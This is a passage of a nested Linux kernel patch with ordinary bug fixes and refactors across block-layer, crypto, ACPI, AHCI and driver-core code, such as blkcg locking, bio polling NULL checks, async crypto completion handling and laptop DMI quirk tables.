+@@ -472,7 +493,6 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	blkg->online = false;
+ 
+ 	radix_tree_delete(&blkcg->blkg_tree, blkg->q->id);
+-	list_del_init(&blkg->q_node);
+ 	hlist_del_init_rcu(&blkg->blkcg_node);
+ 
+ 	/*
+@@ -1273,6 +1293,7 @@ int blkcg_init_disk(struct gendisk *disk)
+ 	int ret;
+ 
+ 	INIT_LIST_HEAD(&q->blkg_list);
++	mutex_init(&q->blkcg_mutex);
+ 
+ 	new_blkg = blkg_alloc(&blkcg_root, disk, GFP_KERNEL);
+ 	if (!new_blkg)
+@@ -1510,6 +1531,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	if (queue_is_mq(q))
+ 		blk_mq_freeze_queue(q);
+ 
++	mutex_lock(&q->blkcg_mutex);
+ 	spin_lock_irq(&q->queue_lock);
+ 
+ 	__clear_bit(pol->plid, q->blkcg_pols);
+@@ -1528,6 +1550,7 @@ void blkcg_deactivate_policy(struct request_queue *q,
+ 	}
+ 
+ 	spin_unlock_irq(&q->queue_lock);
++	mutex_unlock(&q->blkcg_mutex);
+ 
+ 	if (queue_is_mq(q))
+ 		blk_mq_unfreeze_queue(q);
+diff --git a/block/blk-core.c b/block/blk-core.c
+index b5098355d8b27..5a0049215ee72 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -684,6 +684,18 @@ static void __submit_bio_noacct_mq(struct bio *bio)
+ 
+ void submit_bio_noacct_nocheck(struct bio *bio)
+ {
++	blk_cgroup_bio_start(bio);
++	blkcg_bio_issue_init(bio);
++
++	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
++		trace_block_bio_queue(bio);
++		/*
++		 * Now that enqueuing has been traced, we need to trace
++		 * completion as well.
++		 */
++		bio_set_flag(bio, BIO_TRACE_COMPLETION);
++	}
++
+ 	/*
+ 	 * We only want one ->submit_bio to be active at a time, else stack
+ 	 * usage with stacked devices could be a problem.  Use current->bio_list
+@@ -788,17 +800,6 @@ void submit_bio_noacct(struct bio *bio)
+ 
+ 	if (blk_throtl_bio(bio))
+ 		return;
+-
+-	blk_cgroup_bio_start(bio);
+-	blkcg_bio_issue_init(bio);
+-
+-	if (!bio_flagged(bio, BIO_TRACE_COMPLETION)) {
+-		trace_block_bio_queue(bio);
+-		/* Now that enqueuing has been traced, we need to trace
+-		 * completion as well.
+-		 */
+-		bio_set_flag(bio, BIO_TRACE_COMPLETION);
+-	}
+ 	submit_bio_noacct_nocheck(bio);
+ 	return;
+ 
+@@ -853,10 +854,16 @@ EXPORT_SYMBOL(submit_bio);
+  */
+ int bio_poll(struct bio *bio, struct io_comp_batch *iob, unsigned int flags)
+ {
+-	struct request_queue *q = bdev_get_queue(bio->bi_bdev);
+ 	blk_qc_t cookie = READ_ONCE(bio->bi_cookie);
++	struct block_device *bdev;
++	struct request_queue *q;
+ 	int ret = 0;
+ 
++	bdev = READ_ONCE(bio->bi_bdev);
++	if (!bdev)
++		return 0;
++
++	q = bdev_get_queue(bdev);
+ 	if (cookie == BLK_QC_T_NONE ||
+ 	    !test_bit(QUEUE_FLAG_POLL, &q->queue_flags))
+ 		return 0;
+@@ -916,7 +923,7 @@ int iocb_bio_iopoll(struct kiocb *kiocb, struct io_comp_batch *iob,
+ 	 */
+ 	rcu_read_lock();
+ 	bio = READ_ONCE(kiocb->private);
+-	if (bio && bio->bi_bdev)
++	if (bio)
+ 		ret = bio_poll(bio, iob, flags);
+ 	rcu_read_unlock();
+ 
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index 6955605629e4f..ec7219caea165 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -866,9 +866,14 @@ static void calc_lcoefs(u64 bps, u64 seqiops, u64 randiops,
+ 
+ 	*page = *seqio = *randio = 0;
+ 
+-	if (bps)
+-		*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC,
+-					   DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE));
++	if (bps) {
++		u64 bps_pages = DIV_ROUND_UP_ULL(bps, IOC_PAGE_SIZE);
++
++		if (bps_pages)
++			*page = DIV64_U64_ROUND_UP(VTIME_PER_SEC, bps_pages);
++		else
++			*page = 1;
++	}
+ 
+ 	if (seqiops) {
+ 		v = DIV64_U64_ROUND_UP(VTIME_PER_SEC, seqiops);
+diff --git a/block/blk-merge.c b/block/blk-merge.c
+index b7c193d67185d..808b58129d3e4 100644
+--- a/block/blk-merge.c
++++ b/block/blk-merge.c
+@@ -757,6 +757,33 @@ void blk_rq_set_mixed_merge(struct request *rq)
+ 	rq->rq_flags |= RQF_MIXED_MERGE;
+ }
+ 
++static inline blk_opf_t bio_failfast(const struct bio *bio)
++{
++	if (bio->bi_opf & REQ_RAHEAD)
++		return REQ_FAILFAST_MASK;
++
++	return bio->bi_opf & REQ_FAILFAST_MASK;
++}
++
++/*
++ * After we are marked as MIXED_MERGE, any new RA bio has to be updated
++ * as failfast, and request's failfast has to be updated in case of
++ * front merge.
++ */
++static inline void blk_update_mixed_merge(struct request *req,
++		struct bio *bio, bool front_merge)
++{
++	if (req->rq_flags & RQF_MIXED_MERGE) {
++		if (bio->bi_opf & REQ_RAHEAD)
++			bio->bi_opf |= REQ_FAILFAST_MASK;
++
++		if (front_merge) {
++			req->cmd_flags &= ~REQ_FAILFAST_MASK;
++			req->cmd_flags |= bio->bi_opf & REQ_FAILFAST_MASK;
++		}
++	}
++}
++
+ static void blk_account_io_merge_request(struct request *req)
+ {
+ 	if (blk_do_io_stat(req)) {
+@@ -954,7 +981,7 @@ enum bio_merge_status {
+ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_back_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -965,6 +992,8 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, false);
++
+ 	req->biotail->bi_next = bio;
+ 	req->biotail = bio;
+ 	req->__data_len += bio->bi_iter.bi_size;
+@@ -978,7 +1007,7 @@ static enum bio_merge_status bio_attempt_back_merge(struct request *req,
+ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 		struct bio *bio, unsigned int nr_segs)
+ {
+-	const blk_opf_t ff = bio->bi_opf & REQ_FAILFAST_MASK;
++	const blk_opf_t ff = bio_failfast(bio);
+ 
+ 	if (!ll_front_merge_fn(req, bio, nr_segs))
+ 		return BIO_MERGE_FAILED;
+@@ -989,6 +1018,8 @@ static enum bio_merge_status bio_attempt_front_merge(struct request *req,
+ 	if ((req->cmd_flags & REQ_FAILFAST_MASK) != ff)
+ 		blk_rq_set_mixed_merge(req);
+ 
++	blk_update_mixed_merge(req, bio, true);
++
+ 	bio->bi_next = req->bio;
+ 	req->bio = bio;
+ 
+diff --git a/block/blk-mq-sched.c b/block/blk-mq-sched.c
+index 23d1a90fec427..06b312c691143 100644
+--- a/block/blk-mq-sched.c
++++ b/block/blk-mq-sched.c
+@@ -19,8 +19,7 @@
+ #include "blk-wbt.h"
+ 
+ /*
+- * Mark a hardware queue as needing a restart. For shared queues, maintain
+- * a count of how many hardware queues are marked for restart.
++ * Mark a hardware queue as needing a restart.
+  */
+ void blk_mq_sched_mark_restart_hctx(struct blk_mq_hw_ctx *hctx)
+ {
+@@ -82,7 +81,7 @@ dispatch:
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+@@ -210,7 +209,7 @@ static struct blk_mq_ctx *blk_mq_next_ctx(struct blk_mq_hw_ctx *hctx,
+ /*
+  * Only SCSI implements .get_budget and .put_budget, and SCSI restarts
+  * its queue by itself in its completion handler, so we don't need to
+- * restart queue if .get_budget() returns BLK_STS_NO_RESOURCE.
++ * restart queue if .get_budget() fails to get the budget.
+  *
+  * Returns -EAGAIN if hctx->dispatch was found non-empty and run_work has to
+  * be run again.  This is necessary to avoid starving flushes.
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 9c8dc70020bc9..b9e3b558367f1 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -658,7 +658,8 @@ struct request *blk_mq_alloc_request_hctx(struct request_queue *q,
+ 	 * allocator for this for the rare use case of a command tied to
+ 	 * a specific queue.
+ 	 */
+-	if (WARN_ON_ONCE(!(flags & (BLK_MQ_REQ_NOWAIT | BLK_MQ_REQ_RESERVED))))
++	if (WARN_ON_ONCE(!(flags & BLK_MQ_REQ_NOWAIT)) ||
++	    WARN_ON_ONCE(!(flags & BLK_MQ_REQ_RESERVED)))
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	if (hctx_idx >= q->nr_hw_queues)
+@@ -1825,12 +1826,13 @@ static int blk_mq_dispatch_wake(wait_queue_entry_t *wait, unsigned mode,
+ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 				 struct request *rq)
+ {
+-	struct sbitmap_queue *sbq = &hctx->tags->bitmap_tags;
++	struct sbitmap_queue *sbq;
+ 	struct wait_queue_head *wq;
+ 	wait_queue_entry_t *wait;
+ 	bool ret;
+ 
+-	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED)) {
++	if (!(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) &&
++	    !(blk_mq_is_shared_tags(hctx->flags))) {
+ 		blk_mq_sched_mark_restart_hctx(hctx);
+ 
+ 		/*
+@@ -1848,6 +1850,10 @@ static bool blk_mq_mark_tag_wait(struct blk_mq_hw_ctx *hctx,
+ 	if (!list_empty_careful(&wait->entry))
+ 		return false;
+ 
++	if (blk_mq_tag_is_reserved(rq->mq_hctx->sched_tags, rq->internal_tag))
++		sbq = &hctx->tags->breserved_tags;
++	else
++		sbq = &hctx->tags->bitmap_tags;
+ 	wq = &bt_wait_ptr(sbq, hctx)->wait;
+ 
+ 	spin_lock_irq(&wq->lock);
+@@ -2096,7 +2102,8 @@ out:
+ 		bool needs_restart;
+ 		/* For non-shared tags, the RESTART check will suffice */
+ 		bool no_tag = prep == PREP_DISPATCH_NO_TAG &&
+-			(hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED);
++			((hctx->flags & BLK_MQ_F_TAG_QUEUE_SHARED) ||
++			blk_mq_is_shared_tags(hctx->flags));
+ 
+ 		if (nr_budgets)
+ 			blk_mq_release_budgets(q, list);
+diff --git a/block/fops.c b/block/fops.c
+index 50d245e8c913a..d2e6be4e3d1c7 100644
+--- a/block/fops.c
++++ b/block/fops.c
+@@ -221,6 +221,24 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 			bio_endio(bio);
+ 			break;
+ 		}
++		if (iocb->ki_flags & IOCB_NOWAIT) {
++			/*
++			 * This is nonblocking IO, and we need to allocate
++			 * another bio if we have data left to map. As we
++			 * cannot guarantee that one of the sub bios will not
++			 * fail getting issued FOR NOWAIT and as error results
++			 * are coalesced across all of them, be safe and ask for
++			 * a retry of this from blocking context.
++			 */
++			if (unlikely(iov_iter_count(iter))) {
++				bio_release_pages(bio, false);
++				bio_clear_flag(bio, BIO_REFFED);
++				bio_put(bio);
++				blk_finish_plug(&plug);
++				return -EAGAIN;
++			}
++			bio->bi_opf |= REQ_NOWAIT;
++		}
+ 
+ 		if (is_read) {
+ 			if (dio->flags & DIO_SHOULD_DIRTY)
+@@ -228,9 +246,6 @@ static ssize_t __blkdev_direct_IO(struct kiocb *iocb, struct iov_iter *iter,
+ 		} else {
+ 			task_io_account_write(bio->bi_iter.bi_size);
+ 		}
+-		if (iocb->ki_flags & IOCB_NOWAIT)
+-			bio->bi_opf |= REQ_NOWAIT;
+-
+ 		dio->size += bio->bi_iter.bi_size;
+ 		pos += bio->bi_iter.bi_size;
+ 
+diff --git a/crypto/asymmetric_keys/public_key.c b/crypto/asymmetric_keys/public_key.c
+index 2f8352e888602..eca5671ad3f22 100644
+--- a/crypto/asymmetric_keys/public_key.c
++++ b/crypto/asymmetric_keys/public_key.c
+@@ -186,8 +186,28 @@ static int software_key_query(const struct kernel_pkey_params *params,
+ 
+ 	len = crypto_akcipher_maxsize(tfm);
+ 	info->key_size = len * 8;
+-	info->max_data_size = len;
+-	info->max_sig_size = len;
++
++	if (strncmp(pkey->pkey_algo, "ecdsa", 5) == 0) {
++		/*
++		 * ECDSA key sizes are much smaller than RSA, and thus could
++		 * operate on (hashed) inputs that are larger than key size.
++		 * For example SHA384-hashed input used with secp256r1
++		 * based keys.  Set max_data_size to be at least as large as
++		 * the largest supported hash size (SHA512)
++		 */
++		info->max_data_size = 64;
++
++		/*
++		 * Verify takes ECDSA-Sig (described in RFC 5480) as input,
++		 * which is actually 2 'key_size'-bit integers encoded in
++		 * ASN.1.  Account for the ASN.1 encoding overhead here.
++		 */
++		info->max_sig_size = 2 * (len + 3) + 2;
++	} else {
++		info->max_data_size = len;
++		info->max_sig_size = len;
++	}
++
+ 	info->max_enc_size = len;
+ 	info->max_dec_size = len;
+ 	info->supported_ops = (KEYCTL_SUPPORTS_ENCRYPT |
+diff --git a/crypto/essiv.c b/crypto/essiv.c
+index e33369df90344..307eba74b901e 100644
+--- a/crypto/essiv.c
++++ b/crypto/essiv.c
+@@ -171,7 +171,12 @@ static void essiv_aead_done(struct crypto_async_request *areq, int err)
+ 	struct aead_request *req = areq->data;
+ 	struct essiv_aead_request_ctx *rctx = aead_request_ctx(req);
+ 
++	if (err == -EINPROGRESS)
++		goto out;
++
+ 	kfree(rctx->assoc);
++
++out:
+ 	aead_request_complete(req, err);
+ }
+ 
+@@ -247,7 +252,7 @@ static int essiv_aead_crypt(struct aead_request *req, bool enc)
+ 	err = enc ? crypto_aead_encrypt(subreq) :
+ 		    crypto_aead_decrypt(subreq);
+ 
+-	if (rctx->assoc && err != -EINPROGRESS)
++	if (rctx->assoc && err != -EINPROGRESS && err != -EBUSY)
+ 		kfree(rctx->assoc);
+ 	return err;
+ }
+diff --git a/crypto/rsa-pkcs1pad.c b/crypto/rsa-pkcs1pad.c
+index 6ee5b8a060c06..4e9d2244ee317 100644
+--- a/crypto/rsa-pkcs1pad.c
++++ b/crypto/rsa-pkcs1pad.c
+@@ -214,16 +214,14 @@ static void pkcs1pad_encrypt_sign_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_encrypt_sign_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req,
+-			pkcs1pad_encrypt_sign_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_encrypt(struct akcipher_request *req)
+@@ -332,15 +330,14 @@ static void pkcs1pad_decrypt_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
++
++	err = pkcs1pad_decrypt_complete(req, err);
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_decrypt_complete(req, err));
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ static int pkcs1pad_decrypt(struct akcipher_request *req)
+@@ -513,15 +510,14 @@ static void pkcs1pad_verify_complete_cb(
+ 		struct crypto_async_request *child_async_req, int err)
+ {
+ 	struct akcipher_request *req = child_async_req->data;
+-	struct crypto_async_request async_req;
+ 
+ 	if (err == -EINPROGRESS)
+-		return;
++		goto out;
+ 
+-	async_req.data = req->base.data;
+-	async_req.tfm = crypto_akcipher_tfm(crypto_akcipher_reqtfm(req));
+-	async_req.flags = child_async_req->flags;
+-	req->base.complete(&async_req, pkcs1pad_verify_complete(req, err));
++	err = pkcs1pad_verify_complete(req, err);
++
++out:
++	akcipher_request_complete(req, err);
+ }
+ 
+ /*
+diff --git a/crypto/seqiv.c b/crypto/seqiv.c
+index 0899d527c2845..b1bcfe537daf1 100644
+--- a/crypto/seqiv.c
++++ b/crypto/seqiv.c
+@@ -23,7 +23,7 @@ static void seqiv_aead_encrypt_complete2(struct aead_request *req, int err)
+ 	struct aead_request *subreq = aead_request_ctx(req);
+ 	struct crypto_aead *geniv;
+ 
+-	if (err == -EINPROGRESS)
++	if (err == -EINPROGRESS || err == -EBUSY)
+ 		return;
+ 
+ 	if (err)
+diff --git a/crypto/xts.c b/crypto/xts.c
+index 63c85b9e64e08..de6cbcf69bbd6 100644
+--- a/crypto/xts.c
++++ b/crypto/xts.c
+@@ -203,12 +203,12 @@ static void xts_encrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, true);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_encrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
+@@ -223,12 +223,12 @@ static void xts_decrypt_done(struct crypto_async_request *areq, int err)
+ 	if (!err) {
+ 		struct xts_request_ctx *rctx = skcipher_request_ctx(req);
+ 
+-		rctx->subreq.base.flags &= ~CRYPTO_TFM_REQ_MAY_SLEEP;
++		rctx->subreq.base.flags &= CRYPTO_TFM_REQ_MAY_BACKLOG;
+ 		err = xts_xor_tweak_post(req, false);
+ 
+ 		if (!err && unlikely(req->cryptlen % XTS_BLOCK_SIZE)) {
+ 			err = xts_cts_final(req, crypto_skcipher_decrypt);
+-			if (err == -EINPROGRESS)
++			if (err == -EINPROGRESS || err == -EBUSY)
+ 				return;
+ 		}
+ 	}
+diff --git a/drivers/accel/Kconfig b/drivers/accel/Kconfig
+index c9ce849b2984a..c8177ae415b8b 100644
+--- a/drivers/accel/Kconfig
++++ b/drivers/accel/Kconfig
+@@ -6,9 +6,10 @@
+ # as, but not limited to, Machine-Learning and Deep-Learning acceleration
+ # devices
+ #
++if DRM
++
+ menuconfig DRM_ACCEL
+ 	bool "Compute Acceleration Framework"
+-	depends on DRM
+ 	help
+ 	  Framework for device drivers of compute acceleration devices, such
+ 	  as, but not limited to, Machine-Learning and Deep-Learning
+@@ -22,3 +23,5 @@ menuconfig DRM_ACCEL
+ 	  major number than GPUs, and will be exposed to user-space using
+ 	  different device files, called accel/accel* (in /dev, sysfs
+ 	  and debugfs).
++
++endif
+diff --git a/drivers/acpi/acpica/Makefile b/drivers/acpi/acpica/Makefile
+index 9e0d95d76fff7..30f3fc13c29d1 100644
+--- a/drivers/acpi/acpica/Makefile
++++ b/drivers/acpi/acpica/Makefile
+@@ -3,7 +3,7 @@
+ # Makefile for ACPICA Core interpreter
+ #
+ 
+-ccflags-y			:= -Os -D_LINUX -DBUILDING_ACPICA
++ccflags-y			:= -D_LINUX -DBUILDING_ACPICA
+ ccflags-$(CONFIG_ACPI_DEBUG)	+= -DACPI_DEBUG_OUTPUT
+ 
+ # use acpi.o to put all files here into acpi.o modparam namespace
+diff --git a/drivers/acpi/acpica/hwvalid.c b/drivers/acpi/acpica/hwvalid.c
+index 915b26448d2c9..0d392e7b0747b 100644
+--- a/drivers/acpi/acpica/hwvalid.c
++++ b/drivers/acpi/acpica/hwvalid.c
+@@ -23,8 +23,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width);
+  *
+  * The table is used to implement the Microsoft port access rules that
+  * first appeared in Windows XP. Some ports are always illegal, and some
+- * ports are only illegal if the BIOS calls _OSI with a win_XP string or
+- * later (meaning that the BIOS itelf is post-XP.)
++ * ports are only illegal if the BIOS calls _OSI with nothing newer than
++ * the specific _OSI strings.
+  *
+  * This provides ACPICA with the desired port protections and
+  * Microsoft compatibility.
+@@ -145,7 +145,8 @@ acpi_hw_validate_io_request(acpi_io_address address, u32 bit_width)
+ 
+ 			/* Port illegality may depend on the _OSI calls made by the BIOS */
+ 
+-			if (acpi_gbl_osi_data >= port_info->osi_dependency) {
++			if (port_info->osi_dependency == ACPI_ALWAYS_ILLEGAL ||
++			    acpi_gbl_osi_data == port_info->osi_dependency) {
+ 				ACPI_DEBUG_PRINT((ACPI_DB_VALUES,
+ 						  "Denied AML access to port 0x%8.8X%8.8X/%X (%s 0x%.4X-0x%.4X)\n",
+ 						  ACPI_FORMAT_UINT64(address),
+diff --git a/drivers/acpi/acpica/nsrepair.c b/drivers/acpi/acpica/nsrepair.c
+index 367fcd201f96e..ec512e06a48ed 100644
+--- a/drivers/acpi/acpica/nsrepair.c
++++ b/drivers/acpi/acpica/nsrepair.c
+@@ -181,8 +181,9 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 	 * Try to fix if there was no return object. Warning if failed to fix.
+ 	 */
+ 	if (!return_object) {
+-		if (expected_btypes && (!(expected_btypes & ACPI_RTYPE_NONE))) {
+-			if (package_index != ACPI_NOT_PACKAGE_ELEMENT) {
++		if (expected_btypes) {
++			if (!(expected_btypes & ACPI_RTYPE_NONE) &&
++			    package_index != ACPI_NOT_PACKAGE_ELEMENT) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+@@ -196,14 +197,15 @@ acpi_ns_simple_repair(struct acpi_evaluate_info *info,
+ 				if (ACPI_SUCCESS(status)) {
+ 					return (AE_OK);	/* Repair was successful */
+ 				}
+-			} else {
++			}
++
++			if (expected_btypes != ACPI_RTYPE_NONE) {
+ 				ACPI_WARN_PREDEFINED((AE_INFO,
+ 						      info->full_pathname,
+ 						      ACPI_WARN_ALWAYS,
+ 						      "Missing expected return value"));
++				return (AE_AML_NO_RETURN_VALUE);
+ 			}
+-
+-			return (AE_AML_NO_RETURN_VALUE);
+ 		}
+ 	}
+ 
+diff --git a/drivers/acpi/battery.c b/drivers/acpi/battery.c
+index f4badcdde76e6..fb64bd217d826 100644
+--- a/drivers/acpi/battery.c
++++ b/drivers/acpi/battery.c
+@@ -440,7 +440,7 @@ static int extract_package(struct acpi_battery *battery,
+ 
+ 			if (element->type == ACPI_TYPE_STRING ||
+ 			    element->type == ACPI_TYPE_BUFFER)
+-				strncpy(ptr, element->string.pointer, 32);
++				strscpy(ptr, element->string.pointer, 32);
+ 			else if (element->type == ACPI_TYPE_INTEGER) {
+ 				strncpy(ptr, (u8 *)&element->integer.value,
+ 					sizeof(u64));
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 192d1784e409b..a222bda7e15b0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -467,17 +467,34 @@ static const struct dmi_system_id lenovo_laptop[] = {
+ 	{ }
+ };
+ 
+-static const struct dmi_system_id schenker_gm_rg[] = {
++static const struct dmi_system_id tongfang_gm_rg[] = {
+ 	{
+-		.ident = "XMG CORE 15 (M22)",
++		.ident = "TongFang GMxRGxx/XMG CORE 15 (M22)/TUXEDO Stellaris 15 Gen4 AMD",
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "SchenkerTechnologiesGmbH"),
+ 			DMI_MATCH(DMI_BOARD_NAME, "GMxRGxx"),
+ 		},
+ 	},
+ 	{ }
+ };
+ 
++static const struct dmi_system_id maingear_laptop[] = {
++	{
++		.ident = "MAINGEAR Vector Pro 2 15",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-15A3070T"),
++		}
++	},
++	{
++		.ident = "MAINGEAR Vector Pro 2 17",
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Micro Electronics Inc"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "MG-VCP2-17A3070T"),
++		},
++	},
++	{ }
++};
++
+ struct irq_override_cmp {
+ 	const struct dmi_system_id *system;
+ 	unsigned char irq;
+@@ -492,7 +509,8 @@ static const struct irq_override_cmp override_table[] = {
+ 	{ asus_laptop, 1, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, false },
+ 	{ lenovo_laptop, 6, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+ 	{ lenovo_laptop, 10, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_LOW, 0, true },
+-	{ schenker_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ tongfang_gm_rg, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
++	{ maingear_laptop, 1, ACPI_EDGE_SENSITIVE, ACPI_ACTIVE_LOW, 1, true },
+ };
+ 
+ static bool acpi_dev_irq_override(u32 gsi, u8 triggering, u8 polarity,
+diff --git a/drivers/acpi/video_detect.c b/drivers/acpi/video_detect.c
+index a8c02608dde45..710ac640267dd 100644
+--- a/drivers/acpi/video_detect.c
++++ b/drivers/acpi/video_detect.c
+@@ -434,7 +434,7 @@ static const struct dmi_system_id video_detect_dmi_table[] = {
+ 	 /* Lenovo Ideapad Z570 */
+ 	 .matches = {
+ 		DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+-		DMI_MATCH(DMI_PRODUCT_NAME, "102434U"),
++		DMI_MATCH(DMI_PRODUCT_VERSION, "Ideapad Z570"),
+ 		},
+ 	},
+ 	{
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 3bb9bb483fe37..14a1c0d14916f 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -421,7 +421,6 @@ static const struct pci_device_id ahci_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x34d3), board_ahci_low_power }, /* Ice Lake LP AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d3), board_ahci_low_power }, /* Comet Lake PCH-U AHCI */
+ 	{ PCI_VDEVICE(INTEL, 0x02d7), board_ahci_low_power }, /* Comet Lake PCH RAID */
+-	{ PCI_VDEVICE(INTEL, 0xa0d3), board_ahci_low_power }, /* Tiger Lake UP{3,4} AHCI */
+ 
+ 	/* JMicron 360/1/3/5/6, match class to avoid IDE function */
+ 	{ PCI_VENDOR_ID_JMICRON, PCI_ANY_ID, PCI_ANY_ID, PCI_ANY_ID,
+diff --git a/drivers/base/core.c b/drivers/base/core.c
+index a3e14143ec0cf..6ed21587be287 100644
+--- a/drivers/base/core.c
++++ b/drivers/base/core.c
+@@ -54,11 +54,12 @@ static LIST_HEAD(deferred_sync);
+ static unsigned int defer_sync_state_count = 1;
+ static DEFINE_MUTEX(fwnode_link_lock);
+ static bool fw_devlink_is_permissive(void);
++static void __fw_devlink_link_to_consumers(struct device *dev);
+ static bool fw_devlink_drv_reg_done;
+ static bool fw_devlink_best_effort;
+ 
+ /**
+- * fwnode_link_add - Create a link between two fwnode_handles.
++ * __fwnode_link_add - Create a link between two fwnode_handles.
+  * @con: Consumer end of the link.
+  * @sup: Supplier end of the link.
+  *
+@@ -74,35 +75,42 @@ static bool fw_devlink_best_effort;
+  * Attempts to create duplicate links between the same pair of fwnode handles
+  * are ignored and there is no reference counting.
+  */
+-int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++static int __fwnode_link_add(struct fwnode_handle *con,
++			     struct fwnode_handle *sup, u8 flags)
+ {
+ 	struct fwnode_link *link;
+-	int ret = 0;
+-
+-	mutex_lock(&fwnode_link_lock);
+ 
+ 	list_for_each_entry(link, &sup->consumers, s_hook)
+-		if (link->consumer == con)
+-			goto out;
++		if (link->consumer == con) {
++			link->flags |= flags;
++			return 0;
++		}
+ 
+ 	link = kzalloc(sizeof(*link), GFP_KERNEL);
+-	if (!link) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
++	if (!link)
++		return -ENOMEM;
+ 
+ 	link->supplier = sup;
+ 	INIT_LIST_HEAD(&link->s_hook);
+ 	link->consumer = con;
+ 	INIT_LIST_HEAD(&link->c_hook);
++	link->flags = flags;
+ 
+ 	list_add(&link->s_hook, &sup->consumers);
+ 	list_add(&link->c_hook, &con->suppliers);
+ 	pr_debug("%pfwP Linked as a fwnode consumer to %pfwP\n",
+ 		 con, sup);
+-out:
+-	mutex_unlock(&fwnode_link_lock);
+ 
++	return 0;
++}
++
++int fwnode_link_add(struct fwnode_handle *con, struct fwnode_handle *sup)
++{
++	int ret;
++
++	mutex_lock(&fwnode_link_lock);
++	ret = __fwnode_link_add(con, sup, 0);
++	mutex_unlock(&fwnode_link_lock);
+ 	return ret;
+ }
+ 
+@@ -121,6 +129,19 @@ static void __fwnode_link_del(struct fwnode_link *link)
+ 	kfree(link);
+ }
+ 
++/**
